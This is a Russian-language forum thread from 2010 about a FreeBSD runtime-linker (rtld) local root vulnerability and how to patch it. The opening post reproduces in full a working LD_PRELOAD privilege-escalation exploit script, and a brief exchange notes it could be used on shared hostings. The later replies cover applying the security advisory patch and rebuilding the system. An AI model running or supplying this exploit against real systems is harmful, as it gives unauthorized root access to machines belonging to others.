Страница 1 из 2
Люди это [censored]!
Добавлено: 2010-01-27 3:50:28
fox
Доброй ночи, прошу меня извинить за не цензуру, я перевозбуждён, но есть причины!
Случайно рылся в инете и нашёл вот это:
http://seclists.org/fulldisclosure/2009/Nov/371
Затем вот это:
http://www.xakep.ru/post/50314/default.asp
Не долго думая, зашёл под самым безобидным пользователем, юзнул этот скрипт:
Код: Выделить всё
#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include <stdio.h>
main() {
extern char **environ;
environ = (char**)malloc(8096);
environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");
execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env
Не потратил больше 15 минут, немного манипуляций с master.passwd и создал нужного пользователя а затем root пароль убрал, и что вы думает захватил свой сервер!
Осталось только одно отшлифовать, найти способ загрузить скрипт и безобидного пользователя, даже не из группы wheel…
Не знаю, возможно многие из вас уже читали об этом, но мне кажется
масштаб этого экплоита велик!!! Есть о чём задуматься, я в шоке!!!
Re: Люди это пиздец!
Добавлено: 2010-01-27 6:18:41
zg
fox писал(а):найти способ загрузить скрипт и безобидного пользователя, даже не из группы wheel…
любой хостинг, хоть платный, хоть бесплатный
стоит, однако, задуматься...
Re: Люди это пиздец!
Добавлено: 2010-01-27 7:44:44
f_andrey
zg писал(а):стоит, однако, задуматься...
О да это обычно не лишне, только смотрим сначала на название раздела, потом можно еше немного подумать
Ну и мотивационна картинка
Re: Люди это пиздец!
Добавлено: 2010-01-27 8:29:26
iye
А я почему то всегда думал что шел доступен только на виртуальных машинах... у всех остальных в качестве шела стоит /usr/sbin/nologin а все скрипты выполняются в chroot окружении...
Re: Люди это [censored]!
Добавлено: 2010-01-27 8:33:47
hizel
опять хладоген потек? надо быть внимательнее что-ли
Re: Люди это [censored]!
Добавлено: 2010-01-27 8:54:18
terminus
Re: Люди это [censored]!
Добавлено: 2010-01-27 9:48:53
princeps
Re: Люди это [censored]!
Добавлено: 2010-01-27 14:22:50
fox
Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!
Re: Люди это [censored]!
Добавлено: 2010-01-27 14:26:56
iye
Re: Люди это [censored]!
Добавлено: 2010-01-27 14:31:41
fox
Извините за не скромный вопрос, а как им пользоваться?
Не получается...
Re: Люди это [censored]!
Добавлено: 2010-01-27 14:43:39
iye
НАмекаю ) Открой ссылку ) Открой )
fox писал(а):
Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!
Re: Люди это [censored]!
Добавлено: 2010-01-27 14:52:11
princeps
fox писал(а):Важно то, как закрыть эту бреш?????Патчь нужен!!!!
Обновиться? Да и подпишись уже на security-advisories, чтобы узнавать о критических уязвимостях не через три месяца
Re: Люди это [censored]!
Добавлено: 2010-01-27 14:55:07
fox
iye писал(а):НАмекаю ) Открой ссылку ) Открой )
fox писал(а):
Согласен, мне не это важно!
Важно то, как закрыть эту бреш?????
Патчь нужен!!!!
Открыл, но патч не катит, чо то:
Код: Выделить всё
# patch < path.path
Hmm... Looks like a unified diff to me...
The text leading up to this was:
--------------------------
|Index: rtld.c
|===================================================================
|--- rtld.c (revision 199977)
|+++ rtld.c (working copy)
--------------------------
File to patch: /usr/src/libexec/rtld-elf/rtld.c
Patching file /usr/src/libexec/rtld-elf/rtld.c using Plan A...
Hunk #1 failed at 366.
1 out of 1 hunks failed--saving rejects to /usr/src/libexec/rtld-elf/rtld.c.rej
Hmm... Ignoring the trailing garbage.
done
Re: Люди это [censored]!
Добавлено: 2010-01-27 14:56:16
fox
princeps писал(а):fox писал(а):Важно то, как закрыть эту бреш?????Патчь нужен!!!!
Обновиться? Да и подпишись уже на security-advisories, чтобы узнавать о критических уязвимостях не через три месяца
А как это сделать? Любезный, не подскажите?
Re: Люди это [censored]!
Добавлено: 2010-01-27 15:01:32
princeps
ну отчего же не подсказать хорошему человеку:
http://lists.freebsd.org/mailman/listin ... ifications
И следи за разделом "новости", там обычно самые важные обновления обсуждаются.
Re: Люди это [censored]!
Добавлено: 2010-01-27 15:04:39
fox
Я пологаю, может быть я не прав, нужно вот по этой ссылке:
http://security.freebsd.org/advisories/ ... 6.rtld.asc
Там есть откуда, что скачать а затем:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/libexec/rtld-elf
# make obj && make depend && make && make install
Так что ли?
Re: Люди это [censored]!
Добавлено: 2010-01-27 15:09:22
fox
Re: Люди это [censored]!
Добавлено: 2010-01-27 15:11:53
iye
Думаю стоит попробовать собрать, если соберется отбэкапиться и попробовать проинсталить и посмотреть что получится.
Re: Люди это [censored]!
Добавлено: 2010-01-27 15:12:59
princeps
обнови исходники и обнови систему по хэндбуку. и будет тебе счастье. С тех пор, ещё уязвимости были, в январе.
Re: Люди это [censored]!
Добавлено: 2010-01-27 15:20:06
fox
princeps писал(а):
обнови исходники и обнови систему по хэндбуку. и будет тебе счастье. С тех пор, ещё уязвимости были, в январе.
Так вы предлогаете полность мир пересобрать?
А если мир пересобирать, я извсеняюсь может быть это покажется глупым но боюсь ошибиться, патчить нужно если мир пересобирать, или разработчики уже побеспакоились за меня?
Re: Люди это [censored]!
Добавлено: 2010-01-27 15:34:02
princeps
fox писал(а): патчить нужно если мир пересобирать,
не нужно. И пересобирать надо не только мир, но и ядро. И обязательно обнови исходники сначала, иначе толку не будет.
Re: Люди это [censored]!
Добавлено: 2010-01-27 15:39:54
fox
princeps писал(а):fox писал(а): патчить нужно если мир пересобирать,
не нужно. И пересобирать надо не только мир, но и ядро. И обязательно обнови исходники сначала, иначе толку не будет.
Ну это понятно, обновить, а потом полный фарш пересборки всего насвети (мира, ядра)...
Спасибо, за внимание!
Re: Люди это [censored]!
Добавлено: 2010-01-27 20:29:30
fox
Всё класс, после апгрейда!!!
Получилось, я там ещё нашёл одного эксплоита, тот ядро переполнял, но после апгрейда всё классно, закрыто!
Спасибо всем за участие!
Re: Люди это [censored]!
Добавлено: 2010-01-28 12:43:01
schizoid
а что freebsd-update fetch не проканает разве? или по-любому мир/ядро пересобирать?
Re: Люди это [censored]!
Добавлено: 2010-01-28 12:46:18
princeps
проканает, наверное, почему не проканать? я пересобираю, мне это как-то надёжнее кажется.
